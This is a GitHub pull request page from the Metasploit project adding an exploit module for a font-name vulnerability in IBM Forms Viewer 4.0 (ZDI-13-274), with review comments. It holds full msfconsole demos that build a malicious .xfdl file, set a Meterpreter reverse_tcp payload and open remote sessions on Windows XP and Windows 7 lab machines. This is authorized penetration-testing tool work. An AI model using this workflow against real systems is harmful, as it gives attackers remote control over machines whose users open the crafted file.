Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add module for ZDI-13-274 #2804

Merged
merged 4 commits into from
Jan 2, 2014
Merged

Add module for ZDI-13-274 #2804

merged 4 commits into from
Jan 2, 2014

Conversation

jvazquez-r7
Copy link
Contributor

Tested against IBM Forms Viewer 4.0 on Windows XP SP3 and Windows 7 SP1.

Download IBM Forms Viewer 4.0 from: https://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=ESD-LOTUSFORMSTRIAL&S_PKG=CRD9QML&S_TACT=109HD0OW&S_CMP=web_dw_rt_swd&lang=en_US&cp=UTF-8

You will ned IBM login

Verification

  • Install Windows XP SP3 or Windows 7 SP1
  • Install IBM Forms Viewer 4.0. Verify which the masqform.exe binary version is 8.0.0.266
  • Run the module like in the DEMO
  • Open the file from the vulnerable environment with IBM Forms Viewer, you should enjoy sessions like in the demo

Demo

msf > use exploit/windows/fileformat/ibm_forms_viewer_fontname 
msf exploit(ibm_forms_viewer_fontname) > show options

Module options (exploit/windows/fileformat/ibm_forms_viewer_fontname):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.xfdl         yes       The file name.


Exploit target:

   Id  Name
   --  ----
   0   IBM Forms Viewer 4.0 / Windows XP SP3 / Windows 7 SP1


msf exploit(ibm_forms_viewer_fontname) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ibm_forms_viewer_fontname) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(ibm_forms_viewer_fontname) > set lport 4444
lport => 4444
msf exploit(ibm_forms_viewer_fontname) > rexploit
[*] Reloading module...

[*] Creating 'msf.xfdl' file ...
[+] msf.xfdl stored at /Users/juan/.msf4/local/msf.xfdl
msf exploit(ibm_forms_viewer_fontname) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.172.244
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.244:1810) at 2013-12-27 10:57:04 -0600

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.244 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.172.133
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.133:49195) at 2013-12-27 10:57:47 -0600

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.133 - Meterpreter session 2 closed.  Reason: User exit

jvazquez-r7 added a commit that referenced this pull request Dec 30, 2013
@jvazquez-r7
Land #2804, @rcvalle's support for disasm on msfelfscan
8986659
@wvu
Copy link
Contributor

wvu commented Jan 2, 2014

Looks like you used the wrong PR number, @jvazquez-r7. :P

@jvazquez-r7
Copy link
Contributor Author

absolutely hehe, good catch @wvu-r7 , sorry about that!

@wvu
Copy link
Contributor

wvu commented Jan 2, 2014

Haha, it's okay. Testing this today!

@jvazquez-r7
Copy link
Contributor Author

thanks @wvu-r7 ! Let me know if there is anything!

@wvu
Copy link
Contributor

wvu commented Jan 2, 2014

Windows 7 SP1:

msf > use exploit/windows/fileformat/ibm_forms_viewer_fontname 
msf exploit(ibm_forms_viewer_fontname) > exploit 

[*] Creating 'msf.xfdl' file ...
[+] msf.xfdl stored at /home/wvu/.msf4/local/msf.xfdl
msf exploit(ibm_forms_viewer_fontname) > use exploit/multi/handler 
msf exploit(handler) > exploit 

[*] Started reverse handler on 10.6.0.198:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 10.6.0.198
[*] Meterpreter session 1 opened (10.6.0.198:4444 -> 10.6.0.198:56356) at 2014-01-02 15:24:09 -0600

meterpreter >

@wvu
Copy link
Contributor

wvu commented Jan 2, 2014

Windows XP SP3:

msf exploit(handler) > exploit 

[*] Started reverse handler on 10.6.0.198:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 10.6.0.198
[*] Meterpreter session 2 opened (10.6.0.198:4444 -> 10.6.0.198:34129) at 2014-01-02 15:33:43 -0600

meterpreter >

wvu
wvu reviewed Jan 2, 2014
View reviewed changes
modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb
]
],
'Privileged' => false,
'DisclosureDate' => 'Apr 03 2008',
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Is this really the disclosure date? Thought it was 2013.

@jvazquez-r7
Copy link
Contributor Author

Thanks @wvu-r7 ! you're the killer! fixing!

@wvu
Copy link
Contributor

wvu commented Jan 2, 2014

Has sense! Landing!

wvu added a commit that referenced this pull request Jan 2, 2014
@wvu
Land #2804, IBM Forms Viewer 4.0 exploit
67a7960
wvu added a commit that referenced this pull request Jan 2, 2014
@wvu
Land #2804 for real (thanks, @jvazquez-r7!)
2d25781 
It was the wrong time to mess with my workflow.
@wvu wvu merged commit eaeb457 into rapid7:master Jan 2, 2014
@jvazquez-r7 jvazquez-r7 deleted the zdi_forms_viewer branch November 18, 2014 15:59
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@jvazquez-r7 @wvu